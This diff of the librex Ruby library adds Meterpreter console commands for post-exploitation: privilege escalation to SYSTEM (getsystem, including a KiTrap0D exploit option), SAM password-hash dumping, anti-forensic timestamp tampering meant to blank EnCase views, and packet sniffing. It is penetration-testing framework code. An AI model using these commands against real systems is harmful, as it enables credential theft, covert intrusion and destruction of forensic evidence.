librex 0.0.20 → 0.0.21

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb

@@ -0,0 +1,61 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Priv
+
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp'
+
+	Klass = Console::CommandDispatcher::Priv
+
+	Dispatchers = 
+		[
+			Klass::Elevate,
+			Klass::Passwd,
+			Klass::Timestomp,
+		]
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+
+		Dispatchers.each { |d|
+			shell.enstack_dispatcher(d)
+		}
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+		}
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Privilege Escalation"
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb

@@ -0,0 +1,98 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The local privilege escalation portion of the extension.
+#
+###
+class Console::CommandDispatcher::Priv::Elevate
+
+	Klass = Console::CommandDispatcher::Priv::Elevate
+
+	include Console::CommandDispatcher
+	
+	ELEVATE_TECHNIQUE_NONE					= -1
+	ELEVATE_TECHNIQUE_ANY					= 0
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
+	ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
+	ELEVATE_TECHNIQUE_VULN_KITRAP0D			= 4
+
+	ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available", 
+										"Service - Named Pipe Impersonation (In Memory/Admin)",
+										"Service - Named Pipe Impersonation (Dropper/Admin)",
+										"Service - Token Duplication (In Memory/Admin)",
+										"Exploit - KiTrap0D (In Memory/User)"
+									]
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"getsystem" => "Attempt to elevate your privilege to that of local system."
+		}
+	end
+
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Elevate"
+	end
+	
+
+	#
+	# Attempt to elevate the meterpreter to that of local system.
+	#
+	def cmd_getsystem( *args )
+	
+		technique = ELEVATE_TECHNIQUE_ANY
+		
+		desc = ""
+		ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
+		
+		getsystem_opts = Rex::Parser::Arguments.new(
+			"-h" => [ false, "Help Banner." ],
+			"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
+		)
+		
+		getsystem_opts.parse(args) { | opt, idx, val |
+			case opt
+				when "-h"
+					print_line( "Usage: getsystem [options]\n" )
+					print_line( "Attempt to elevate your privilege to that of local system." )
+					print_line( getsystem_opts.usage )
+					return
+				when "-t"
+					technique = val.to_i
+			end
+		}
+
+		if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
+			print_error( "Technique '#{technique}' is out of range." );
+			return false;
+		end
+			
+		result = client.priv.getsystem( technique )
+		
+		# got system?
+		if result[0]
+			print_line( "...got system (via technique #{result[1]})." );
+		else
+			print_line( "...failed to get system." );
+		end
+		
+		return result
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb

@@ -0,0 +1,51 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The password database portion of the privilege escalation extension.
+#
+###
+class Console::CommandDispatcher::Priv::Passwd
+
+	Klass = Console::CommandDispatcher::Priv::Passwd
+
+	include Console::CommandDispatcher
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"hashdump" => "Dumps the contents of the SAM database"
+		}
+	end
+
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Password database"
+	end
+
+	#
+	# Displays the contents of the SAM database
+	#
+	def cmd_hashdump(*args)
+		client.priv.sam_hashes.each { |user|
+			print_line("#{user}")
+		}
+		
+		return true
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb

@@ -0,0 +1,132 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# This class provides commands that interact with the timestomp feature set of
+# the privilege escalation extension.
+#
+###
+class Console::CommandDispatcher::Priv::Timestomp
+
+	Klass = Console::CommandDispatcher::Priv::Timestomp
+
+	include Console::CommandDispatcher
+
+	@@timestomp_opts = Rex::Parser::Arguments.new(
+		"-m" => [ true,  "Set the \"last written\" time of the file" ],
+		"-a" => [ true,  "Set the \"last accessed\" time of the file" ],
+		"-c" => [ true,  "Set the \"creation\" time of the file" ],
+		"-e" => [ true,  "Set the \"mft entry modified\" time of the file" ],
+		"-z" => [ true,  "Set all four attributes (MACE) of the file" ],
+		"-f" => [ true,  "Set the MACE of attributes equal to the supplied file" ],
+		"-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ],
+		"-r" => [ false, "Set the MACE timestamps recursively on a directory" ],
+		"-v" => [ false, "Display the UTC MACE values of the file" ],
+		"-h" => [ false, "Help banner" ])
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"timestomp" => "Manipulate file MACE attributes"
+		}
+	end
+
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Timestomp"
+	end
+
+	#
+	# This command provides the same level of features that vinnie's command
+	# line timestomp interface provides with a similar argument set.
+	#
+	def cmd_timestomp(*args)
+		if (args.length < 2)
+			print_line("\nUsage: timestomp file_path OPTIONS\n" +
+				@@timestomp_opts.usage)
+			return
+		end
+
+		file_path = args.shift
+		modified  = nil
+		accessed  = nil
+		creation  = nil
+		emodified = nil
+
+		@@timestomp_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-m"
+					modified  = str_to_time(val)
+				when "-a"
+					accessed  = str_to_time(val)
+				when "-c"
+					creation  = str_to_time(val)
+				when "-e"
+					emodified = str_to_time(val)
+				when "-z"
+					puts "#{val}"
+					modified  = str_to_time(val)
+					accessed  = str_to_time(val)
+					creation  = str_to_time(val)
+					emodified = str_to_time(val)
+				when "-f"
+					print_status("Setting MACE attributes on #{file_path} from #{val}")
+					client.priv.fs.set_file_mace_from_file(file_path, val)
+				when "-b"
+					print_status("Blanking file MACE attributes on #{file_path}")
+					client.priv.fs.blank_file_mace(file_path)
+				when "-r"
+					print_status("Blanking directory MACE attributes on #{file_path}")
+					client.priv.fs.blank_directory_mace(file_path)
+				when "-v"
+					hash = client.priv.fs.get_file_mace(file_path)
+
+					print_line("Modified      : #{hash['Modified']}")
+					print_line("Accessed      : #{hash['Accessed']}")
+					print_line("Created       : #{hash['Created']}")
+					print_line("Entry Modified: #{hash['Entry Modified']}")
+				when "-h"
+					print_line("\nUsage: timestomp file_path OPTIONS\n" +
+						@@timestomp_opts.usage)
+					return
+			end
+		}
+
+		# If any one of the four times were specified, change them.
+		if (modified or accessed or creation or emodified)
+			print_status("Setting specific MACE attributes on #{file_path}")
+			client.priv.fs.set_file_mace(file_path, modified, accessed, 
+				creation, emodified)
+		end
+	end
+
+protected
+
+	#
+	# Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS
+	#
+	def str_to_time(str) # :nodoc:
+		r, mon, day, year, hour, min, sec = str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a
+
+		if (mon == nil)
+			raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})"
+		end
+
+		Time.mktime(year, mon, day, hour, min, sec, 0)
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb

@@ -0,0 +1,187 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Packet sniffer extension user interface.
+#
+###
+class Console::CommandDispatcher::Sniffer
+
+	Klass = Console::CommandDispatcher::Sniffer
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the sniffer command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"sniffer_interfaces" => "Enumerate all sniffable network interfaces",
+			"sniffer_start" => "Start packet capture on a specific interface",
+			"sniffer_stop"  => "Stop packet capture on a specific interface",
+			"sniffer_stats" => "View statistics of an active capture",
+			"sniffer_dump"  => "Retrieve captured packet data to PCAP file",
+		}
+	end
+
+
+	def cmd_sniffer_interfaces(*args)
+		
+		ifaces = client.sniffer.interfaces()
+
+		print_line()
+
+		ifaces.each do |i|
+			print_line(sprintf("%d - '%s' ( type:%d mtu:%d usable:%s dhcp:%s wifi:%s )", 
+				i['idx'], i['description'],
+				i['type'], i['mtu'], i['usable'], i['dhcp'], i['wireless'])
+			)
+		end
+		
+		print_line()
+
+		return true
+	end
+	
+	def cmd_sniffer_start(*args)
+		intf = args.shift.to_i
+		if (intf == 0)
+			print_error("Usage: sniffer_start [interface-id] [packet-buffer (1-200000)] [bpf filter (posix meterpreter only)]")
+			return
+		end
+		maxp = (args.shift || 50000).to_i
+		bpf  = args.join(" ")
+		
+		client.sniffer.capture_start(intf, maxp, bpf)
+		print_status("Capture started on interface #{intf} (#{maxp} packet buffer)")
+		return true
+	end
+	
+	def cmd_sniffer_stop(*args)
+	   intf = args[0].to_i
+		if (intf == 0)
+			print_error("Usage: sniffer_stop [interface-id]")
+			return
+		end
+		
+		client.sniffer.capture_stop(intf)
+		print_status("Capture stopped on interface #{intf}")
+		return true
+	end
+	
+	def cmd_sniffer_stats(*args)
+	   intf = args[0].to_i
+		if (intf == 0)
+			print_error("Usage: sniffer_stats [interface-id]")
+			return
+		end
+		
+		stats = client.sniffer.capture_stats(intf)
+		print_status("Capture statistics for interface #{intf}")
+		stats.each_key do |k|
+			puts "\t#{k}: #{stats[k]}"
+		end
+		
+		return true		
+	end
+	
+	def cmd_sniffer_dump(*args)
+	   intf = args[0].to_i
+		if (intf == 0 or not args[1])
+			print_error("Usage: sniffer_dump [interface-id] [pcap-file]")
+			return
+		end
+		
+		path_cap = args[1]
+		path_raw = args[1] + '.raw'
+		
+		fd = ::File.new(path_raw, 'wb+')
+		
+		print_status("Flushing packet capture buffer for interface #{intf}...")
+		res = client.sniffer.capture_dump(intf)
+		print_status("Flushed #{res[:packets]} packets (#{res[:bytes]} bytes)")
+		
+		bytes_all = res[:bytes] || 0
+		bytes_got = 0
+		bytes_pct = 0
+
+		while (bytes_all > 0)
+			res = client.sniffer.capture_dump_read(intf,1024*512)
+			
+			bytes_got += res[:bytes]
+
+			pct = ((bytes_got.to_f / bytes_all.to_f) * 100).to_i
+			if(pct > bytes_pct)
+				print_status("Downloaded #{"%.3d" % pct}% (#{bytes_got}/#{bytes_all})...")
+				bytes_pct = pct
+			end		
+			break if res[:bytes] == 0
+			fd.write(res[:data])
+		end
+		
+		fd.close
+		
+		print_status("Download completed, converting to PCAP...")
+		
+		fd = nil
+		if(::File.exist?(path_cap))
+			fd = ::File.new(path_cap, 'ab+')
+		else
+			fd = ::File.new(path_cap, 'wb+')
+			fd.write([0xa1b2c3d4, 2, 4, 0, 0, 65536, 1].pack('NnnNNNN'))
+		end	
+
+		pkts = {}		
+		od = ::File.new(path_raw, 'rb')
+
+
+		# TODO: reorder packets based on the ID (only an issue if the buffer wraps)
+		while(true)
+			buf = od.read(20)
+			break if not buf
+		
+			idh,idl,thi,tlo,len = buf.unpack('N5')
+			break if not len
+			if(len > 10000) 
+				print_error("Corrupted packet data (length:#{len})")
+				break
+			end
+			
+			pkt_id = (idh << 32) +idl
+			pkt_ts = Rex::Proto::SMB::Utils.time_smb_to_unix(thi,tlo)
+			pkt    = od.read(len)
+			
+			fd.write([pkt_ts,0,len,len].pack('NNNN')+pkt)
+		end
+		od.close
+		fd.close
+		
+		::File.unlink(path_raw)
+		print_status("PCAP file written to #{path_cap}")
+	end	
+	
+	#
+	# Name for this dispatcher
+	# sni
+	def name
+		"Sniffer"
+	end
+
+end
+
+end
+end
+end
+end